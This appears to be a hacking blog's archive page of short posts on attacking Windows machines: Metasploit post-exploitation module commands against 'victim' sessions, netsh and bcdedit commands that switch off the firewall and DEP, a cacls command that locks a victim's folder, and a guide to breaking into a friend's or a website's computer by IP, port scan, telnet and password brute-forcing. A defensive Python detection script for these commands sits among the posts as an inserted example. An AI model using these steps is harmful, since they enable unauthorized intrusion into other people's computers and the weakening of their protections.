Showing posts with label Hacking Windows. Show all posts

Friday, 11 July 2014

How to get MUICache Entries in Remote Windows Machine


According to Nirsoft.net, “each time that you start using a new application, Windows operating system automatically extract the application name from the version resource of the exe file, and stores it for using it later, in Registry key known as the ‘MuiCache’.”

msf > use post/windows/gather/enum_muicache

msf post(enum_muicache) > set payload windows/meterpreter/reverse_tcp

msf post(enum_muicache) > set lhost 192.168.1.3 (IP of Local Host)

msf post(enum_muicache) > set session 2

msf post(enum_muicache) > exploit


How to Disable Windows Firewall using Metasploit



Windows Firewall can help protect your PC from hackers and malicious software. In Windows 7, it is still powerful—but we have made it more flexible and easier to use.

For example, now you can fine-tune the protection and notifications you want for each of your network profiles—Home, Work, and Public. When you are connected to a public network like a library or a coffee shop, you may want to block all incoming connections. At home or work, this might be overkill. Whatever level of protection you choose for your profiles, you will be able to switch between them with ease.

Command: netsh firewall set opmode disable

Wednesday, 9 July 2014

How to stop Data Execution Prevention Service (DEP) using Metasploit in Windows


Data Execution Prevention (DEP) is a security feature that can help prevent damage to your computer from viruses and other security threats. Harmful programs can try to attack Windows by attempting to run (also known as execute) code from system memory locations reserved for Windows and other authorized programs. These types of attacks can harm your programs and files.

DEP can help protect your computer by monitoring your programs to make sure that they use system memory safely. If DEP notices a program on your computer using memory incorrectly, it closes the program and notifies you.

Command: bcdedit.exe /set {current} nx AlwaysOff
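
For defenders: the firewall and DEP commands in the two posts above, and the cacls ACL change shown further down this page, each appear as a process command line in process-creation audit logs. The following detection logic is an added example, not part of the original posts; the event field names and the sample records are constructed assumptions.

```python
import re

# Rules keyed to the commands shown on this page. Matching is done on a
# normalized command line, so case, full paths, ".exe", quotes and
# cmd.exe caret escapes do not hide the command.
RULES = [
    ("firewall-disabled",
     re.compile(r"\bnetsh(\.exe)?\s+firewall\s+set\s+opmode\s+(mode\s*=\s*)?disable\b")),
    ("dep-disabled",
     re.compile(r"\bbcdedit(\.exe)?\s.*\bnx\s+alwaysoff\b")),
    ("acl-deny-everyone",
     re.compile(r"\bcacls(\.exe)?\s.*/p\s+everyone:n\b")),
]

def normalize(cmdline):
    """Lower-case, drop quotes and carets, collapse runs of whitespace."""
    cleaned = cmdline.lower().replace('"', "").replace("^", "")
    return " ".join(cleaned.split())

def scan(events):
    """Return (time, host, user, rule) for every event matching a rule."""
    hits = []
    for ev in events:
        cmd = normalize(ev["cmdline"])
        for name, pattern in RULES:
            if pattern.search(cmd):
                hits.append((ev["time"], ev["host"], ev["user"], name))
    return hits

# Constructed sample records, shaped like process-creation audit events
# (field names are assumptions, not a real log schema).
SAMPLE_EVENTS = [
    {"time": "2014-07-11T10:02:11", "host": "WS01", "user": "alice",
     "cmdline": "netsh firewall set opmode disable"},
    {"time": "2014-07-11T10:02:40", "host": "WS01", "user": "alice",
     "cmdline": r'"C:\Windows\System32\bcdedit.exe" /set {current} nx AlwaysOff'},
    {"time": "2014-07-11T10:03:05", "host": "WS01", "user": "alice",
     "cmdline": r"cacls C:\Users\alice\Documents /e /p everyone:n"},
    {"time": "2014-07-11T10:05:00", "host": "WS02", "user": "bob",
     "cmdline": "netsh firewall show opmode"},
    {"time": "2014-07-11T10:06:00", "host": "WS02", "user": "bob",
     "cmdline": "bcdedit /set {current} nx OptIn"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(*hit)
```

The read-only `show opmode` query and the `nx OptIn` setting in the sample data are deliberately not flagged, so the rules fire only on the state-changing forms.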

Wednesday, 19 June 2013

Hack remote computer via IP and open ports





Hack remote computer:


Hacking is accessing something or somebody on the internet without their permission or interest. In summary, hacking is a very easy job: instead of using the front door, you find the hidden door of a house and hijack the precious things. Of all kinds of hacking, hacking via IP address is one of the most common yet powerful beginnings.



You may want to hack a website and put your advertisement there or grab some database information. In this type of hacking, you are playing with the web server’s computer instead of the administrator’s computer, because www.website.com is hosted on a separate web server rather than a personal computer.


Another case is accessing your friend’s computer from your home. Again, this is IP based, and it is possible only when your friend’s computer is online. If it is off or not connected to the internet, then remote IP hacking is totally impossible.

Well, both kinds of hacking follow the same process. Let’s summarize what we must do.



1. Confirm the website or computer you want to hack.
2. Find or trace its IP address.
3. Make sure that the IP address is online.
4. Scan for open ports.
5. Check for vulnerable ports.
6. Access through the port.
7. Brute-force the username and password.

Now let me describe the basic steps briefly, so that even a child can understand them.
First, get the IP address of the victim.
To get the IP address of the victim website, ping it in the command prompt.

For example,
ping www.google.com



will fetch the IP address of Google.com.


This is how we can get the IP address of the victim’s website.

How about your friend’s PC? You can’t do www.yourfriend’sname.com, can you? Finding your friend’s IP address is a slightly tough job, and it is tougher if he has a dynamic IP address that keeps changing.

One of the widely used methods to detect your friend’s IP address is by chatting with him.

You might find this article helpful

How to get the IP address using MSN/Yahoo/Pidgin messenger


Now you have the IP address, right? Is it online?

To check the online status, just ping the IP address; if it is online, it will reply.


If the IP address is online, scan for open ports. Open ports are like closed doors without locks: you can go inside and outside easily.


Use Advanced Port Scanner to scan for all open and vulnerable ports.



Now that you have the IP address and an open port of the victim, you can use telnet to try to access them. Make sure that you have telnet enabled on your computer, or install it from Control Panel > Add/Remove Programs > Add Windows Components.

Now open the command prompt and use the telnet command to connect to the IP address. Use the following syntax for the connection.


telnet [IP address] [Port]



You’ll be asked to input login information.


If you can guess the information easily, then it’s OK. Otherwise you can use a brute-forcing tool such as Brutus or THC Hydra.
In this way you’ll be able to hack a remote computer using only an IP address.

Tuesday, 19 March 2013

How to lock and unlock folder in remote victim pc using metasploit

Once you have the meterpreter session, use the ‘shell’ command to get a command prompt on the target.

Lock and unlock folder:

Type cacls (Folder Name) /e /p everyone:n and press Enter.

Sunday, 17 March 2013

Windows Gather USB Drive History Metasploit Module


This module will enumerate USB Drive history on a target host.


Usage Information


msf > use post/windows/gather/usb_history
msf post(usb_history) > set SESSION [INTEGER]

Module Options

SESSION: The session to run this module on.
VERBOSE: Enable detailed status messages.
WORKSPACE: Specify the workspace for this module.

Saturday, 24 November 2012

Mozilla Firefox 11 Bootstrapped Addon Social Engineering Code Execution in Windows




Firefox 8/9 AttributeChildRemoved() Use-After-Free Vulnerability




Viper FakeUpdate Script in Backtrack 5 R3




WebSploit Framework - Java Applet Attack in Backtrack 5 R3




WebSploit Framework - Browser autopwn in Backtrack 5 R3


